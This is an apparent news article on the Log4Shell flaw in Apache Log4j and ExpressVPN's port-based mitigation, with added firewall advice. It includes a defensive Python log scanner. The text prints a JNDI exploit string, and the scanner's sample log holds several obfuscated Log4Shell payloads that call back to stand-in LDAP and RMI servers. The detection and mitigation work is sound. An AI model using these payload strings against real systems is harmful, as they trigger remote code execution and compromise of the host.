ExpressVPN delivers protection from Log4Shell vulnerability
Over the last few days it has become clear that the critical vulnerability in the Apache Log4j Java logging library, tracked as CVE-2021-44228 and known as Log4Shell, may well be the worst cybersecurity flaw of the last decade.
While there is no universal remedy for the vulnerability yet beyond patching every affected application, ExpressVPN has released an update to its VPN app that tries to help mitigate the damage.
What is the Log4Shell vulnerability?
The Log4Shell vulnerability was publicized by LunaSec, with Microsoft's Minecraft as the first widely reported target. Attackers could compromise Minecraft servers simply by typing a crafted string into the in-game chat box, because the server logged the message with Log4j.
The vulnerability was a zero-day when it was disclosed, and it lets an unauthenticated attacker execute arbitrary code or commands on any machine whose Java application logs attacker-controlled text. When Log4j logs a string such as ${jndi:ldap://attacker-host/x}, it performs a JNDI lookup that connects to the attacker's server and loads the Java class it returns. This allows attackers to steal information, harvest credentials, install malware, create backdoors, and even take full control of the host running the vulnerable application.
Perhaps the biggest threat is the popularity of Log4j itself. It is embedded in a huge number of online services, leaving major companies around the world exposed to potentially devastating attacks. The ever-growing list of affected vendors and services includes Cisco, IBM, Tesla, Twitter, Apple iCloud, Cloudflare, Siemens, and many more.
At the same time, attackers from all over the world are launching no fewer than 100 exploitation attempts per minute against the Apache Log4j 2 vulnerability. Over 1.2 million attacks have been recorded since the bug was made public on Friday, December 10th, and some of the attackers are believed to be Chinese state-backed groups targeting US enterprises.
The number of IP addresses scanning the Internet for the Log4Shell vulnerability has increased a hundredfold since Friday and keeps growing, while companies scramble to fix the issue before it is too late.
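The lookup mechanism described above, as an added example that is not part of the original article: a small Python log scanner that collapses the nested ${lower:...}, ${upper:...} and ${key:-default} lookups attackers use to hide the word "jndi" from naive pattern matching, then extracts the scheme, host and port of each callback server. The web-server log lines and IP addresses are constructed for illustration, and the resolution rules cover only the lookup types a defender can resolve offline.

```python
import re
from urllib.parse import unquote

# Log4j 2 lookup syntax is ${name:arg} or ${key:-default}. Attackers nest these so
# the literal text "jndi" never appears in the raw payload; we resolve inside-out.
INNER_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
JNDI_URI = re.compile(r'\$\{jndi:([a-z]+)://([^/:}\s]+)(?::(\d+))?', re.I)
DEFAULT_PORTS = {'ldap': 389, 'ldaps': 636, 'rmi': 1099, 'dns': 53}

# Constructed sample access log (not from any real incident).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.10:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:L}dap://198.51.100.10:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${::-r}mi://198.51.100.20:1099/x}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2F198.51.100.30%2Fz%7D HTTP/1.1" 200 "-"',
]


def _resolve(body):
    """Resolve one innermost lookup the way Log4j 2 would, or return None to keep it."""
    low = body.lower()
    if low.startswith('jndi:'):
        return None                      # the payload itself: keep it for extraction
    if low.startswith('lower:'):
        return body[6:].lower()
    if low.startswith('upper:'):
        return body[6:].upper()
    if ':-' in body:                     # ${env:X:-j} or ${::-j}: key cannot resolve, default wins
        return body.split(':-', 1)[1]
    return None                          # unknown lookup (date, sys, ...): leave untouched


def deobfuscate(text, max_rounds=32):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def _sub(m):
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(_sub, text)
        if not changed:
            break
    return text


def find_jndi_callbacks(line):
    """Return [(scheme, host, port), ...] for every JNDI lookup hidden in one log line."""
    text = deobfuscate(unquote(line))    # URL-decode first: payloads often arrive in query strings
    found = []
    for m in JNDI_URI.finditer(text):
        scheme = m.group(1).lower()
        port = int(m.group(3)) if m.group(3) else DEFAULT_PORTS.get(scheme)
        found.append((scheme, m.group(2), port))
    return found


def scan(lines):
    """Return [(line_number, callbacks), ...] for the lines that carry a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        callbacks = find_jndi_callbacks(line)
        if callbacks:
            hits.append((number, callbacks))
    return hits


if __name__ == '__main__':
    for number, callbacks in scan(SAMPLE_LOG):
        print(f'line {number}: {callbacks}')
```

The extracted host and port are what an egress filter or a blocklist needs; note that line 4 of the sample calls back on port 1099 and line 5 on the LDAPS default of 636, both of which fall in the port ranges discussed later, while an attacker is free to pick any other port.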
ExpressVPN releases an update to its VPN to protect against Log4Shell vulnerability
On December 14th ExpressVPN released an update to its VPN app that is meant to add a layer of protection from the Log4Shell flaw.
While the vulnerability did not affect the provider itself, ExpressVPN recognized that many of the applications its customers use might be exposed to attack. The update aims to add an extra layer of protection against the vulnerability, to at least minimize the damage.
How does the ExpressVPN patch work?
As ExpressVPN’s Chief Architect, Peter Membrey, explains, there were two ways to mitigate Log4Shell from the VPN: a port-based approach that blocks the outbound LDAP and Java RMI connections an exploited application makes to fetch the attacker’s payload, or a packet-based approach that inspects traffic for the exploit string itself. ExpressVPN chose the former.
In a situation where every second matters, the reason is simple: speed.
“We implemented the port-based blocking solution immediately as it was the fastest solution to bring to market, and responding at speed was crucial to minimize the impact of this vulnerability globally. However, we will continue to work on the packet-based approach and plan to roll it out as soon as it is ready and we are confident we can do it client-side with no negative privacy impacts.”
The ExpressVPN LDAP port patch is already live across all ExpressVPN servers. Because the blocking happens on the server side of the tunnel, all the user has to do is keep the VPN on.
Is this the solution to the issue?
While ExpressVPN definitely deserves praise for moving so fast in a time of need, its port patch is no remedy. Port blocking stops only the exploits whose callback server listens on one of the listed ports: an attacker who hosts the LDAP or RMI server on port 80 or 443 walks straight past it, traffic that does not traverse the VPN tunnel is not covered at all, and the vulnerable library stays in place. It cannot prevent the direst and most sophisticated attacks.
In all fairness, the experts at ExpressVPN do not claim that their solution is a complete one:
“To be clear, this is not a silver bullet, but it will make a significant impact on protecting internet users. The nature of this vulnerability means that just being cybersecurity-savvy won’t protect you from it—especially if you use platforms that allow chat, like Minecraft, or other gaming or social platforms.”
So the ExpressVPN port-based solution is an extra layer of protection that can fend off some of the attacks. Its focus is the end user, the ExpressVPN customer who could become collateral damage while attackers around the world race to exploit the newfound weakness. Enterprises require much more thorough means of defense.
Additional measures of protection against the vulnerability
Apart from getting ExpressVPN and using it at all times until more universal means of mitigating the Log4Shell vulnerability become available, here are a few other ways you can protect yourself as a user:
- Update your firewall settings to block outbound traffic on ports you do not normally use but that Log4Shell callbacks are known to use: Java RMI on 1099, and LDAP on 389, 636, 1389, 3268 and 3269, among others. Bear in mind that an attacker can run the callback server on any port, so this only raises the bar.
- Some of the software on your device may be vulnerable to the Log4j bug. Turn on auto-updates for all of your apps and programs, and install security updates as soon as they become available; the real fix is a patched Log4j release (2.16.0 or later at the time of writing) inside each affected application.
- Continue monitoring updates on the understanding of the issue, its possible exploits, as well as ways to fight against it.
We will keep you updated on the latest developments with Log4j, as well as ways to protect yourself against it.